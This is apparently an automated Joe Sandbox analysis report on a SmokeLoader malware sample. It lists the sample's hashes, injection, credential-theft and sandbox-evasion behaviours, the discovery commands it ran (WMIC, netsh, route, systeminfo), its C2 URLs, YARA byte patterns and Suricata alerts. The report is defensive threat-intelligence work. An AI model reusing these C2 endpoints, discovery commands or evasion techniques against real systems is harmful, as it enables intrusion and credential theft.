Edit tour

Windows Analysis Report
OCYe9qcxiM.exe

Overview

General Information

Sample name:	OCYe9qcxiM.exe renamed because original name is a hash value
Original sample name:	2a6994149baff1e680719f89062bfcc7.exe
Analysis ID:	1522699
MD5:	2a6994149baff1e680719f89062bfcc7
SHA1:	62abd53b0db022f2d20cb7ba5e1f2373753ecba1
SHA256:	ce434bc783d75cceafbddd59dd3ed43d4bf1811e0344ba5fdc6958af146254e7
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the windows firewall

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

OCYe9qcxiM.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\OCYe9qcxiM.exe" MD5: 2A6994149BAFF1E680719F89062BFCC7)

explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

4470.exe (PID: 7960 cmdline: C:\Users\user\AppData\Local\Temp\4470.exe MD5: D07C1E0124B1CFA23AA3699216AA912F)

354F.exe (PID: 8108 cmdline: C:\Users\user\AppData\Local\Temp\354F.exe MD5: 815279E7D757D334D6E9EF9B249CA705)

cmd.exe (PID: 1308 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4040 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 7472 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2300 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3700 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3120 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6680 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4584 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4932 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3364 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 1056 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 5496 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4608 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 3756 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6080 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

ipconfig.exe (PID: 7412 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)

ROUTE.EXE (PID: 5672 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)

netsh.exe (PID: 5680 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

systeminfo.exe (PID: 7580 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

tasklist.exe (PID: 7864 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

explorer.exe (PID: 1012 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 5268 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 1996 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7144 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7252 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

hehcrfb (PID: 7748 cmdline: C:\Users\user\AppData\Roaming\hehcrfb MD5: 2A6994149BAFF1E680719F89062BFCC7)

fihcrfb (PID: 8068 cmdline: C:\Users\user\AppData\Roaming\fihcrfb MD5: D07C1E0124B1CFA23AA3699216AA912F)

msiexec.exe (PID: 3500 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

hehcrfb (PID: 4448 cmdline: C:\Users\user\AppData\Roaming\hehcrfb MD5: 2A6994149BAFF1E680719F89062BFCC7)

fihcrfb (PID: 6848 cmdline: C:\Users\user\AppData\Roaming\fihcrfb MD5: D07C1E0124B1CFA23AA3699216AA912F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x370c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3520:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3808:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x37a4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: explorer.exe PID: 1996	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 7144	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.4470.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.4470.exe.2160e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.3.fihcrfb.6d0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.fihcrfb.6c0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.3.4470.exe.2170000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.fihcrfb.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\hehcrfb, CommandLine: C:\Users\user\AppData\Roaming\hehcrfb, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hehcrfb, NewProcessName: C:\Users\user\AppData\Roaming\hehcrfb, OriginalFileName: C:\Users\user\AppData\Roaming\hehcrfb, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\hehcrfb, ProcessId: 7748, ProcessName: hehcrfb

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 5496, ProcessName: WMIC.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 5672, ProcessName: ROUTE.EXE

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:37:52.397966+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49706	187.228.112.175	80	TCP
2024-09-30T15:37:53.550741+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49707	187.228.112.175	80	TCP
2024-09-30T15:37:54.522033+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49708	187.228.112.175	80	TCP
2024-09-30T15:37:55.560773+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49709	187.228.112.175	80	TCP
2024-09-30T15:37:56.721574+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49710	187.228.112.175	80	TCP
2024-09-30T15:37:57.725587+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49711	187.228.112.175	80	TCP
2024-09-30T15:37:58.851638+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49712	187.228.112.175	80	TCP
2024-09-30T15:37:59.878104+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49713	187.228.112.175	80	TCP
2024-09-30T15:38:00.864999+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49714	187.228.112.175	80	TCP
2024-09-30T15:38:01.850458+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49715	187.228.112.175	80	TCP
2024-09-30T15:38:03.027320+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49716	187.228.112.175	80	TCP
2024-09-30T15:38:03.993808+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49717	187.228.112.175	80	TCP
2024-09-30T15:38:04.972429+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49718	187.228.112.175	80	TCP
2024-09-30T15:38:05.963208+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49719	187.228.112.175	80	TCP
2024-09-30T15:38:06.991497+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49720	187.228.112.175	80	TCP
2024-09-30T15:38:07.970450+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49721	187.228.112.175	80	TCP
2024-09-30T15:38:08.937819+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49722	187.228.112.175	80	TCP
2024-09-30T15:38:09.905426+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49723	187.228.112.175	80	TCP
2024-09-30T15:38:10.885092+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49724	187.228.112.175	80	TCP
2024-09-30T15:38:11.851843+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49725	187.228.112.175	80	TCP
2024-09-30T15:38:17.653595+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49728	187.228.112.175	80	TCP
2024-09-30T15:38:18.643607+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49729	187.228.112.175	80	TCP
2024-09-30T15:38:19.631633+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49730	187.228.112.175	80	TCP
2024-09-30T15:38:21.247631+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49731	187.228.112.175	80	TCP
2024-09-30T15:38:22.219164+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49732	187.228.112.175	80	TCP
2024-09-30T15:38:23.194439+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49733	187.228.112.175	80	TCP
2024-09-30T15:38:24.808335+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49734	187.228.112.175	80	TCP
2024-09-30T15:38:26.006013+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49735	187.228.112.175	80	TCP
2024-09-30T15:38:26.988643+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49736	187.228.112.175	80	TCP
2024-09-30T15:38:27.988458+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49737	187.228.112.175	80	TCP
2024-09-30T15:38:44.499108+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49738	23.145.40.162	443	TCP
2024-09-30T15:38:45.886177+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49739	23.145.40.162	443	TCP
2024-09-30T15:38:46.894888+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49740	23.145.40.162	443	TCP
2024-09-30T15:38:47.794779+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49741	23.145.40.162	443	TCP
2024-09-30T15:38:48.830258+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49742	23.145.40.162	443	TCP
2024-09-30T15:38:50.503370+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49743	23.145.40.162	443	TCP
2024-09-30T15:38:52.011851+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49744	23.145.40.162	443	TCP
2024-09-30T15:38:52.984161+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49745	23.145.40.162	443	TCP
2024-09-30T15:38:53.912532+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49746	23.145.40.162	443	TCP
2024-09-30T15:38:54.938562+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49747	23.145.40.162	443	TCP
2024-09-30T15:38:56.246553+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49748	23.145.40.162	443	TCP
2024-09-30T15:38:57.222508+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49749	23.145.40.162	443	TCP
2024-09-30T15:39:03.093048+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49750	23.145.40.162	443	TCP
2024-09-30T15:39:34.947698+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49751	187.228.112.175	80	TCP
2024-09-30T15:39:36.916354+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49752	187.228.112.175	80	TCP
2024-09-30T15:39:40.479139+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49753	187.228.112.175	80	TCP
2024-09-30T15:39:47.650001+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49754	187.228.112.175	80	TCP
2024-09-30T15:39:57.130255+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49755	187.228.112.175	80	TCP
2024-09-30T15:40:09.910486+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49756	187.228.112.175	80	TCP
2024-09-30T15:40:17.577744+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49757	23.145.40.162	443	TCP
2024-09-30T15:40:24.269864+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49758	109.121.204.14	80	TCP
2024-09-30T15:40:37.644731+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49759	23.145.40.162	443	TCP
2024-09-30T15:40:46.200997+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49760	109.121.204.14	80	TCP
2024-09-30T15:40:59.327335+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49761	23.145.40.162	443	TCP
2024-09-30T15:41:09.207582+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49762	109.121.204.14	80	TCP
2024-09-30T15:41:22.625430+0200	2039103	1	A Network Trojan was detected	192.168.2.8	49763	23.145.40.162	443	TCP

ETPRO MALWARE Dridex Post Checkin Activity 3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:38:44.836500+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49738	23.145.40.162	443	TCP
2024-09-30T15:38:46.251562+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49739	23.145.40.162	443	TCP
2024-09-30T15:38:47.176802+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49740	23.145.40.162	443	TCP
2024-09-30T15:38:48.079552+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49741	23.145.40.162	443	TCP
2024-09-30T15:38:49.104360+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49742	23.145.40.162	443	TCP
2024-09-30T15:38:51.323680+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49743	23.145.40.162	443	TCP
2024-09-30T15:38:52.294530+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49744	23.145.40.162	443	TCP
2024-09-30T15:38:53.297588+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49745	23.145.40.162	443	TCP
2024-09-30T15:38:54.205270+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49746	23.145.40.162	443	TCP
2024-09-30T15:38:55.243276+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49747	23.145.40.162	443	TCP
2024-09-30T15:38:56.520099+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49748	23.145.40.162	443	TCP
2024-09-30T15:38:57.565466+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49749	23.145.40.162	443	TCP
2024-09-30T15:39:03.458246+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49750	23.145.40.162	443	TCP
2024-09-30T15:40:17.914963+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49757	23.145.40.162	443	TCP
2024-09-30T15:40:38.006496+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49759	23.145.40.162	443	TCP
2024-09-30T15:40:59.669661+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49761	23.145.40.162	443	TCP
2024-09-30T15:41:22.977909+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.8	49763	23.145.40.162	443	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:38:44.970431+0200	2829848	2	Potentially Bad Traffic	23.145.40.162	443	192.168.2.8	49738	TCP

Joe Sandbox Signatures

Click to jump to signature section

